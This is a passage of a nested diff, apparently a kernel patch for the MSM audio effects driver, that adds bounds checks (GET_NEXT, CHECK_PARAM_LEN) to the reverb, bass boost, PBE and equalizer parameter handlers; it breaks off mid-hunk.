prev_enable_flag = reverb->enable_flag; -- reverb->enable_flag = *values++; -+ reverb->enable_flag = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s:REVERB_ENABLE prev:%d,new:%d\n", __func__, - prev_enable_flag, reverb->enable_flag); - if (prev_enable_flag != reverb->enable_flag) { -- 
*updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_ENABLE; -- *updt_params++ = REVERB_ENABLE_PARAM_SZ; -- *updt_params++ = reverb->enable_flag; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_ENABLE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_ENABLE; -+ *updt_params++ = -+ REVERB_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ reverb->enable_flag; - } - break; - case REVERB_MODE: -@@ -283,16 +356,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->mode = *values++; -+ reverb->mode = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_MODE val:%d\n", - __func__, reverb->mode); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_MODE; -- *updt_params++ = REVERB_MODE_PARAM_SZ; -- *updt_params++ = reverb->mode; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_MODE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_MODE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_MODE; -+ *updt_params++ = -+ REVERB_MODE_PARAM_SZ; -+ *updt_params++ = -+ reverb->mode; - } - break; - case REVERB_PRESET: -@@ -301,16 +384,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->preset = *values++; -+ reverb->preset = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_PRESET val:%d\n", - __func__, reverb->preset); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_PRESET; -- *updt_params++ = REVERB_PRESET_PARAM_SZ; -- *updt_params++ = reverb->preset; - 
params_length += COMMAND_PAYLOAD_SZ + - REVERB_PRESET_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_PRESET", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_PRESET; -+ *updt_params++ = -+ REVERB_PRESET_PARAM_SZ; -+ *updt_params++ = -+ reverb->preset; - } - break; - case REVERB_WET_MIX: -@@ -319,17 +412,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->wet_mix = *values++; -+ reverb->wet_mix = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_WET_MIX val:%d\n", - __func__, reverb->wet_mix); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_WET_MIX_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_WET_MIX", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_WET_MIX; -- *updt_params++ = REVERB_WET_MIX_PARAM_SZ; -- *updt_params++ = reverb->wet_mix; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_WET_MIX_PARAM_SZ; -+ *updt_params++ = -+ reverb->wet_mix; - } - break; - case REVERB_GAIN_ADJUST: -@@ -338,17 +440,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->gain_adjust = *values++; -+ reverb->gain_adjust = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_GAIN_ADJUST val:%d\n", - __func__, reverb->gain_adjust); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_GAIN_ADJUST_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_GAIN_ADJUST", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - 
AUDPROC_PARAM_ID_REVERB_GAIN_ADJUST; -- *updt_params++ = REVERB_GAIN_ADJUST_PARAM_SZ; -- *updt_params++ = reverb->gain_adjust; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_GAIN_ADJUST_PARAM_SZ; -+ *updt_params++ = -+ reverb->gain_adjust; - } - break; - case REVERB_ROOM_LEVEL: -@@ -357,17 +468,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->room_level = *values++; -+ reverb->room_level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_ROOM_LEVEL val:%d\n", - __func__, reverb->room_level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_ROOM_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_ROOM_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_ROOM_LEVEL; -- *updt_params++ = REVERB_ROOM_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->room_level; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_ROOM_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->room_level; - } - break; - case REVERB_ROOM_HF_LEVEL: -@@ -376,17 +496,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->room_hf_level = *values++; -+ reverb->room_hf_level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_ROOM_HF_LEVEL val%d\n", - __func__, reverb->room_hf_level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_ROOM_HF_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_ROOM_HF_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_ROOM_HF_LEVEL; -- *updt_params++ = 
REVERB_ROOM_HF_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->room_hf_level; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_ROOM_HF_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->room_hf_level; - } - break; - case REVERB_DECAY_TIME: -@@ -395,17 +524,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->decay_time = *values++; -+ reverb->decay_time = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DECAY_TIME val:%d\n", - __func__, reverb->decay_time); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DECAY_TIME_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DECAY_TIME", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DECAY_TIME; -- *updt_params++ = REVERB_DECAY_TIME_PARAM_SZ; -- *updt_params++ = reverb->decay_time; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DECAY_TIME_PARAM_SZ; -+ *updt_params++ = -+ reverb->decay_time; - } - break; - case REVERB_DECAY_HF_RATIO: -@@ -414,17 +552,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->decay_hf_ratio = *values++; -+ reverb->decay_hf_ratio = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DECAY_HF_RATIO val%d\n", - __func__, reverb->decay_hf_ratio); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DECAY_HF_RATIO_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DECAY_HF_RATIO", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DECAY_HF_RATIO; -- *updt_params++ = REVERB_DECAY_HF_RATIO_PARAM_SZ; -- *updt_params++ = 
reverb->decay_hf_ratio; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DECAY_HF_RATIO_PARAM_SZ; -+ *updt_params++ = -+ reverb->decay_hf_ratio; - } - break; - case REVERB_REFLECTIONS_LEVEL: -@@ -433,18 +580,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->reflections_level = *values++; -+ reverb->reflections_level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_REFLECTIONS_LEVEL val:%d\n", - __func__, reverb->reflections_level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = -- AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL; -- *updt_params++ = -- REVERB_REFLECTIONS_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->reflections_level; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_REFLECTIONS_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_REFLECTIONS_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_REFLECTIONS_LEVEL; -+ *updt_params++ = -+ REVERB_REFLECTIONS_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->reflections_level; - } - break; - case REVERB_REFLECTIONS_DELAY: -@@ -453,18 +608,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->reflections_delay = *values++; -+ reverb->reflections_delay = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_REFLECTIONS_DELAY val:%d\n", - __func__, reverb->reflections_delay); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = -- AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY; -- *updt_params++ = -- REVERB_REFLECTIONS_DELAY_PARAM_SZ; -- *updt_params++ = reverb->reflections_delay; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_REFLECTIONS_DELAY_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ 
MAX_INBAND_PARAM_SZ, -+ "REVERB_REFLECTIONS_DELAY", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_REFLECTIONS_DELAY; -+ *updt_params++ = -+ REVERB_REFLECTIONS_DELAY_PARAM_SZ; -+ *updt_params++ = -+ reverb->reflections_delay; - } - break; - case REVERB_LEVEL: -@@ -473,16 +636,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->level = *values++; -+ reverb->level = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_LEVEL val:%d\n", - __func__, reverb->level); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_LEVEL; -- *updt_params++ = REVERB_LEVEL_PARAM_SZ; -- *updt_params++ = reverb->level; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_LEVEL_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_LEVEL", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ AUDPROC_PARAM_ID_REVERB_LEVEL; -+ *updt_params++ = -+ REVERB_LEVEL_PARAM_SZ; -+ *updt_params++ = -+ reverb->level; - } - break; - case REVERB_DELAY: -@@ -491,16 +664,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->delay = *values++; -+ reverb->delay = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s:REVERB_DELAY val:%d\n", - __func__, reverb->delay); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -- *updt_params++ = AUDPROC_PARAM_ID_REVERB_DELAY; -- *updt_params++ = REVERB_DELAY_PARAM_SZ; -- *updt_params++ = reverb->delay; - params_length += COMMAND_PAYLOAD_SZ + - REVERB_DELAY_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DELAY", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; -+ *updt_params++ = -+ 
AUDPROC_PARAM_ID_REVERB_DELAY; -+ *updt_params++ = -+ REVERB_DELAY_PARAM_SZ; -+ *updt_params++ = -+ reverb->delay; - } - break; - case REVERB_DIFFUSION: -@@ -509,17 +692,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->diffusion = *values++; -+ reverb->diffusion = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DIFFUSION val:%d\n", - __func__, reverb->diffusion); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DIFFUSION_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DIFFUSION", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DIFFUSION; -- *updt_params++ = REVERB_DIFFUSION_PARAM_SZ; -- *updt_params++ = reverb->diffusion; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DIFFUSION_PARAM_SZ; -+ *updt_params++ = -+ reverb->diffusion; - } - break; - case REVERB_DENSITY: -@@ -528,17 +720,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- reverb->density = *values++; -+ reverb->density = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: REVERB_DENSITY val:%d\n", - __func__, reverb->density); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_REVERB; -+ params_length += COMMAND_PAYLOAD_SZ + -+ REVERB_DENSITY_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "REVERB_DENSITY", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_REVERB; - *updt_params++ = - AUDPROC_PARAM_ID_REVERB_DENSITY; -- *updt_params++ = REVERB_DENSITY_PARAM_SZ; -- *updt_params++ = reverb->density; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - REVERB_DENSITY_PARAM_SZ; -+ *updt_params++ = -+ reverb->density; - } - break; - default: -@@ 
-546,7 +747,7 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac, - break; - } - } -- if (params_length && !msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - else -@@ -560,15 +761,16 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - struct bass_boost_params *bass_boost, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -581,10 +783,14 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case BASS_BOOST_ENABLE: - if (length != 1 || index_offset != 0) { -@@ -593,18 +799,27 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = bass_boost->enable_flag; -- bass_boost->enable_flag = *values++; -+ bass_boost->enable_flag = -+ GET_NEXT(values, param_max_offset, 
rc); - pr_debug("%s: BASS_BOOST_ENABLE prev:%d new:%d\n", - __func__, prev_enable_flag, - bass_boost->enable_flag); - if (prev_enable_flag != bass_boost->enable_flag) { -- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST; -+ params_length += COMMAND_PAYLOAD_SZ + -+ BASS_BOOST_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "BASS_BOOST_ENABLE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_BASS_BOOST; - *updt_params++ = - AUDPROC_PARAM_ID_BASS_BOOST_ENABLE; -- *updt_params++ = BASS_BOOST_ENABLE_PARAM_SZ; -- *updt_params++ = bass_boost->enable_flag; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - BASS_BOOST_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ bass_boost->enable_flag; - } - break; - case BASS_BOOST_MODE: -@@ -613,17 +828,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- bass_boost->mode = *values++; -+ bass_boost->mode = -+ GET_NEXT(values, param_max_offset, rc); - pr_debug("%s: BASS_BOOST_MODE val:%d\n", - __func__, bass_boost->mode); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST; -+ params_length += COMMAND_PAYLOAD_SZ + -+ BASS_BOOST_MODE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "BASS_BOOST_MODE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_BASS_BOOST; - *updt_params++ = - AUDPROC_PARAM_ID_BASS_BOOST_MODE; -- *updt_params++ = BASS_BOOST_MODE_PARAM_SZ; -- *updt_params++ = bass_boost->mode; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - BASS_BOOST_MODE_PARAM_SZ; -+ *updt_params++ = -+ bass_boost->mode; - } - break; - case BASS_BOOST_STRENGTH: -@@ -632,17 +856,26 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - rc = -EINVAL; - goto invalid_config; - } -- bass_boost->strength = *values++; -- pr_debug("%s: BASS_BOOST_STRENGTHi val:%d\n", -+ bass_boost->strength = -+ GET_NEXT(values, 
param_max_offset, rc); -+ pr_debug("%s: BASS_BOOST_STRENGTH val:%d\n", - __func__, bass_boost->strength); - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_BASS_BOOST; -+ params_length += COMMAND_PAYLOAD_SZ + -+ BASS_BOOST_STRENGTH_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "BASS_BOOST_STRENGTH", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_BASS_BOOST; - *updt_params++ = - AUDPROC_PARAM_ID_BASS_BOOST_STRENGTH; -- *updt_params++ = BASS_BOOST_STRENGTH_PARAM_SZ; -- *updt_params++ = bass_boost->strength; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - BASS_BOOST_STRENGTH_PARAM_SZ; -+ *updt_params++ = -+ bass_boost->strength; - } - break; - default: -@@ -650,7 +883,7 @@ int msm_audio_effects_bass_boost_handler(struct audio_client *ac, - break; - } - } -- if (params_length && !msm_dts_eagle_is_hpx_on()) -+ if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - else -@@ -664,15 +897,16 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - struct pbe_params *pbe, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, j, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -685,10 +919,14 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t 
command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); - switch (command_id) { - case PBE_ENABLE: - pr_debug("%s: PBE_ENABLE\n", __func__); -@@ -698,15 +936,24 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = pbe->enable_flag; -- pbe->enable_flag = *values++; -+ pbe->enable_flag = -+ GET_NEXT(values, param_max_offset, rc); - if (prev_enable_flag != pbe->enable_flag) { -- *updt_params++ = AUDPROC_MODULE_ID_PBE; -+ params_length += COMMAND_PAYLOAD_SZ + -+ PBE_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "PBE_ENABLE", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_PBE; - *updt_params++ = - AUDPROC_PARAM_ID_PBE_ENABLE; -- *updt_params++ = PBE_ENABLE_PARAM_SZ; -- *updt_params++ = pbe->enable_flag; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = - PBE_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ pbe->enable_flag; - } - break; - case PBE_CONFIG: -@@ -719,15 +966,26 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - goto invalid_config; - } - if (command_config_state == CONFIG_SET) { -- *updt_params++ = AUDPROC_MODULE_ID_PBE; -+ params_length += COMMAND_PAYLOAD_SZ + length; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "PBE_PARAM", rc); -+ if (rc != 0) -+ break; -+ *updt_params++ = -+ AUDPROC_MODULE_ID_PBE; - *updt_params++ = - AUDPROC_PARAM_ID_PBE_PARAM_CONFIG; -- *updt_params++ = length; -+ *updt_params++ = -+ length; - for (j = 0; j < length; ) { - j += sizeof(*updt_params); -- *updt_params++ = *values++; -+ *updt_params++ = -+ GET_NEXT( -+ values, -+ param_max_offset, -+ rc); - } -- 
params_length += COMMAND_PAYLOAD_SZ + length; - } - break; - default: -@@ -735,7 +993,7 @@ int msm_audio_effects_pbe_handler(struct audio_client *ac, - break; - } - } -- if (params_length) -+ if (params_length && (rc == 0)) - q6asm_send_audio_effects_params(ac, params, - params_length); - invalid_config: -@@ -747,15 +1005,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - struct eq_params *eq, - long *values) - { -- int devices = *values++; -- int num_commands = *values++; -- char *params; -+ long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1; -+ char *params = NULL; -+ int rc = 0; -+ int devices = GET_NEXT(values, param_max_offset, rc); -+ int num_commands = GET_NEXT(values, param_max_offset, rc); - int *updt_params, i, prev_enable_flag; - uint32_t params_length = (MAX_INBAND_PARAM_SZ); -- int rc = 0; - - pr_debug("%s\n", __func__); -- if (!ac) { -+ if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) { - pr_err("%s: cannot set audio effects\n", __func__); - return -EINVAL; - } -@@ -768,11 +1027,16 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - updt_params = (int *)params; - params_length = 0; - for (i = 0; i < num_commands; i++) { -- uint32_t command_id = *values++; -- uint32_t command_config_state = *values++; -- uint32_t index_offset = *values++; -- uint32_t length = *values++; -- int idx, j; -+ uint32_t command_id = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t command_config_state = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t index_offset = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t length = -+ GET_NEXT(values, param_max_offset, rc); -+ uint32_t idx; -+ int j; - switch (command_id) { - case EQ_ENABLE: - if (length != 1 || index_offset != 0) { -@@ -781,17 +1045,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - goto invalid_config; - } - prev_enable_flag = eq->enable_flag; -- eq->enable_flag = *values++; -+ eq->enable_flag = -+ GET_NEXT(values, 
param_max_offset, rc); - pr_debug("%s: EQ_ENABLE prev:%d new:%d\n", __func__, - prev_enable_flag, eq->enable_flag); - if (prev_enable_flag != eq->enable_flag) { -+ params_length += COMMAND_PAYLOAD_SZ + -+ EQ_ENABLE_PARAM_SZ; -+ CHECK_PARAM_LEN(params_length, -+ MAX_INBAND_PARAM_SZ, -+ "EQ_ENABLE", rc); -+ if (rc != 0) -+ break; - *updt_params++ = - AUDPROC_MODULE_ID_POPLESS_EQUALIZER; -- *updt_params++ = AUDPROC_PARAM_ID_EQ_ENABLE; -- *updt_params++ = EQ_ENABLE_PARAM_SZ; -- *updt_params++ = eq->enable_flag; -- params_length += COMMAND_PAYLOAD_SZ + -+ *updt_params++ = -+ AUDPROC_PARAM_ID_EQ_ENABLE; -+ *updt_params++ = - EQ_ENABLE_PARAM_SZ; -+ *updt_params++ = -+ eq->enable_flag; - } - break; - case EQ_CONFIG: -@@ -805,9 +1078,12 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - eq->config.eq_pregain, eq->config.preset_id); - for (idx = 0; idx < MAX_EQ_BANDS; idx++) - eq->per_band_cfg[idx].band_idx = -1; -- eq->config.eq_pregain = *values++; -- eq->config.preset_id = *values++; -- eq->config.num_bands = *values++; -+ eq->config.eq_pregain = -+ GET_NEXT(values, param_max_offset, rc); -+ eq->config.preset_id = -+ GET_NEXT(values, param_max_offset, rc); -+ eq->config.num_bands = -+ GET_NEXT(values, param_max_offset, rc); - if (eq->config.num_bands > MAX_EQ_BANDS) { - pr_err("EQ_CONFIG:invalid num of bands\n"); - rc = -EINVAL; -@@ -822,48 +1098,59 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac, - goto invalid_config; - } - for (j = 0; j < eq->config.num_bands; j++) { -- idx = *values++; -+ idx = GET_NEXT(values, param_max_offset, rc); - if (idx >= MAX_EQ_BANDS) { - pr_err("EQ_CONFIG:invalid band index\n"); - rc = -EINVAL; - goto invalid_config; - } - eq->per_band_cfg[idx].band_idx = idx; -- 